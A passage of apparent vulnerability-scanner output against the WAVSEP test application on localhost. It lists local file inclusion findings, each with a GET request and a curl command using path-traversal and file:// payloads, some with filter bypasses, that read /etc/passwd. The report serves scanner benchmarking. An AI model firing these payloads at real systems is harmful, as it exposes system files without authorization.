curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Valid/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Valid/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Valid/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Valid/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Valid/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Valid/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Valid/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Valid/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Valid/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Valid/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Valid/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Valid/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Valid/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Valid/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Valid/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Valid/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Valid/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Valid/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Valid/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Valid/Case40-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Valid/Case40-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Valid/Case40-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Valid/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Valid/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Valid/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case04-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultRelativeInput-AnyPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case04-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultRelativeInput-AnyPathReq-Read.jsp?target=file%3A%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case04-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultRelativeInput-AnyPathReq-Read.jsp?target=file%3A%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case13-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case13-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case13-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case40-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case40-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case40-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case54-LFI-FileClass-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case54-LFI-FileClass-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case54-LFI-FileClass-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case04-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultRelativeInput-AnyPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case04-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultRelativeInput-AnyPathReq-Read.jsp?target=file%3A%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case04-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultRelativeInput-AnyPathReq-Read.jsp?target=file%3A%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case13-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case13-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case13-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
